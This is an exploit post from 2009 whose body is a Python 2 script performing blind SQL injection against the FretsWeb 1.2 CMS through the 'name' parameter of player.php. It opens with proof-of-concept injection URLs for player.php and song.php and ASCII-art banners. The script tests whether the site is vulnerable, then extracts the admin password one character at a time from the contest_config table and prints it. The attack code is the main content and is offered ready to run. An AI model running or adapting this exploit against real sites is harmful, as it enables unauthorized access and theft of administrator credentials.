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Posted on 18 June 2009

#!/usr/bin/python #*********************************************************************************************** #*********************************************************************************************** #** ** #** ** #** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** #** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** # [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** #** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\n#**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>-- #** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ # [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] #** ** #** ** #** VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O ** #** PROUD TO BE SPANISH! ** #** ** #*********************************************************************************************** #*********************************************************************************************** # #--------------------------------------------------------------------------------------------- #| (GET var 'name') BLIND SQL INJECTION EXPLOIT | #|-------------------------------------------------------------------------------------------| #| | FretsWeb 1.2 | | #| CMS INFORMATION: ------------------------ | #| | #|-->WEB: http://sourceforge.net/projects/fretsweb/ | #|-->DOWNLOAD: http://sourceforge.net/projects/fretsweb/ | #|-->DEMO: N/A | #|-->CATEGORY: CMS / Games/Entertainment | #|-->DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It... | #| is an improved version of FoFCS.It is meant for... | #|-->RELEASED: 2009-05-30 | #| | #| CMS VULNERABILITY: | #| | #|-->TESTED ON: firefox 3 | #|-->DORK: N/A | #|-->CATEGORY: BLIND SQLi PYTHON EXPLOIT | #|-->AFFECT VERSION: CURRENT (MAYBE <= ?) | #|-->Discovered Bug date: 2009-06-02 | #|-->Reported Bug date: 2009-06-02 | #|-->Fixed bug date: 2009-06-14 | #|-->Info patch: http://sourceforge.net/projects/fretsweb/ | #|-->Author: YEnH4ckEr | #|-->mail: y3nh4ck3r[at]gmail[dot]com | #|-->WEB/BLOG: N/A | #|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | #|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) | #--------------------------------------------------------------------------------------------- # #------------ #CONDITIONS: #------------ # #magic quotes=OFF # #------- #NEED: #------- # #Valid name # #--------------------------------------- #PROOF OF CONCEPT (SQL INJECTION): #--------------------------------------- # #http://[HOST]/[PATH]/player.php?name=[valid_name]'+and+1=1%23 --> TRUE #http://[HOST]/[PATH]/player.php?name=[valid_name]'+AND+1=0%23 --> FALSE # # #http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=1%23 --> TRUE #http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=0%23 --> FALSE # #-------------- #WATCH VIDEOS #-------------- # # BSQLi --> http://www.youtube.com/watch?v=BYrkuAN2ggI # # LFI --> http://www.youtube.com/watch?v=LZ8cG_sIHow # # ############################################################################## ############################################################################## ##**************************************************************************## ## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)! ## ##**************************************************************************## ##--------------------------------------------------------------------------## ##**************************************************************************## ## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!## ##**************************************************************************## ############################################################################## ############################################################################## # #Used modules import urllib,sys,re,os #Defined functions def init(): if(sys.platform=='win32'): os.system("cls") os.system ("title FretsWeb 1.2 Blind SQL Injection Exploit") os.system ("color 02") else: os.sytem("clear") print " ####################################################### " print " ####################################################### " print " ## FretsWeb 1.2 Blind SQL Injection Exploit ## " print " ## ++Conditions: magic_quotes=OFF ## " print " ## ++Needed: Valid name ## " print " ## Author: Y3nh4ck3r ## " print " ## Contact:y3nh4ck3r[at]gmail[dot]com ## " print " ## Proud to be Spanish! ## " print " ####################################################### " print " ####################################################### " def request(urltarget): conn=urllib.urlopen(urltarget) outcode=conn.read() #print outcode #--> Active this line for debugger mode return outcode def error(): print " ------------------------------------------------------------ " print " Web isn't vulnerable! " print " --->Maybe: " print " 1.-Patched. " print " 2.-Bad path or host. " print " 3.-Bad name. " print " 4.-Magic quotes ON. " print " EXPLOIT FAILED! " print " ------------------------------------------------------------ " sys.exit() def testedblindsql(): print " ----------------------------------------------------------------- " print " WEB MAYBE BE VULNERABLE! " print " Tested Blind SQL Injection. " print " Starting exploit... " print " ----------------------------------------------------------------- " def helper(filename): print " [!!!] FretsWeb 1.2 Blind SQL Injection Exploit " print " [!!!] USAGE MODE: [!!!] " print " [!!!] python "+filename+" [HOST] [PATH] [NAME] " print " [!!!] [HOST]: Web. " print " [!!!] [PATH]: Home Path. " print " [!!!] [NAME]: Name for fish " print " [!!!] Example: python "+filename+" 'www.example.com' 'demo' 'y3nh4ck3r' " sys.exit() def brute_length(urlrequest): #Username length flag=1 i=0 while(flag==1): i=i+1 blindsql=urlrequest+"'+AND+(SELECT+length(value)+FROM+contest_config+WHERE+name='admin_password')="+str(i)+"%23" #injected code output=request(blindsql) if(re.search("<title>Fretsweb - Player</title>",output)): flag=2 else: flag=1 #This is the max length of username if (i>50): error() #Save column length length=i print " <<<<<--------------------------------------------------------->>>>> " print " Length catched! " print " Length Username --> "+str(length)+" " print " Wait several minutes... " print " <<<<<--------------------------------------------------------->>>>> " return length def exploiting (lengthvalue,urlrequest): #Bruteforcing values values="" k=1 z=32 while((k<=lengthvalue) and (z<=126)): blindsql=urlrequest+"'+AND+ascii(substring((SELECT+value+FROM+contest_config+WHERE+name='admin_password'),"+str(k)+",1))="+str(z)+"%23" #injected code output=request(blindsql) if(re.search("<title>Fretsweb - Player</title>",output)): values=values+chr(z) k=k+1 z=32 #new char z=z+1 return values #Main init() #Init variables if(len(sys.argv) <= 3): helper(sys.argv[0]) host=sys.argv[1] path=sys.argv[2] nameforfish=sys.argv[3] finalrequest="http://"+host+"/"+path+"/player.php?name="+nameforfish testblind1=finalrequest+"'+AND+1=1%23" #Return true outcode1=request(testblind1) testblind2=finalrequest+"'+AND+1=0%23" #Return false outcode2=request(testblind2) #Check BSQLi if(outcode1==outcode2): error() else: testedblindsql() #Catching length of admin password lengthadmin=brute_length(finalrequest) #Catching value of password (not hashed) passwordadmin=exploiting(lengthadmin,finalrequest) print " ************************************************* " print " ********* EXPLOIT EXECUTED SUCCESSFULLY ******** " print " ************************************************* " print " Admin-password: "+passwordadmin+" " print " <<----------------------FINISH!-------------------->> " print " <<---------------Thanks to: y3nh4ck3r-------------->> " print " <<------------------------EOF---------------------->> " #Check all arguments